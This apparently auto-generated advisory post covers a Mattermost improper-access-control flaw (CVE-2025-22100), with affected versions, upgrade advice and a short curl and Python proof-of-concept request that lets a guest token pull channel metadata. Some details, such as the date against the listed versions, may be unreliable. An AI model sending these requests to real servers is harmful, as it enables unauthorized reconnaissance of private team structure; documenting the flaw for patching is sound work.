Listen to this Post
The CVE-2025-22100 vulnerability stems from an authorization flaw within the `/api/v4/teams/{team_id}/channels/ids` API endpoint. In affected versions of Mattermost, the permission check for guest users was incorrectly implemented. When a guest user, who typically has highly restricted visibility, sent a POST request to this endpoint with a list of channel IDs, the system did not properly verify if the user had explicit ‘read’ permissions for those specific public channels. Instead of cross-referencing the guest’s limited team membership against the requested channels, the endpoint would return the metadata for any active public channel within the given team. This allowed guest users to discover and gather information about public channels they were not members of, violating the intended security model and leading to an information disclosure issue.
Platform: Mattermost
Version: 10.5.x <= 10.5.10, 10.11.x <= 10.11.2
Vulnerability : Improper Access Control
Severity: Medium
date: 2025-01-28
Prediction: 2025-02-11
What Undercode Say:
curl -X POST "https://mattermost.example.com/api/v4/teams/abc123/channels/ids" \ -H "Authorization: Bearer GUEST_TOKEN" \ -H "Content-Type: application/json" \ -d '["channel_id_1", "channel_id_2"]'
import requests
headers = {'Authorization': 'Bearer GUEST_TOKEN'}
data = ['channel_id_1', 'channel_id_2']
response = requests.post('https://mattermost/api/v4/teams/team_id/channels/ids', json=data, headers=headers)
print(response.json())
How Exploit:
Guest users exploit the flawed API endpoint by sending a POST request containing a list of channel IDs. The system insecurely returns metadata like channel names, display names, and purposes for public channels the guest should not have access to, enabling unauthorized discovery and reconnaissance of team structure.
Protection from this CVE
Upgrade Mattermost to version 10.5.11, 10.11.3, or a later fixed release. These versions contain the corrected authorization logic that properly validates a guest user’s permissions against each requested channel, ensuring metadata is only returned for channels the user is explicitly authorized to view.
Impact:
Information Disclosure. Guest users can map out a team’s public channel structure, gaining insights into internal discussions, projects, and team organization that should remain hidden from their view, potentially aiding further social engineering or targeted attacks.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
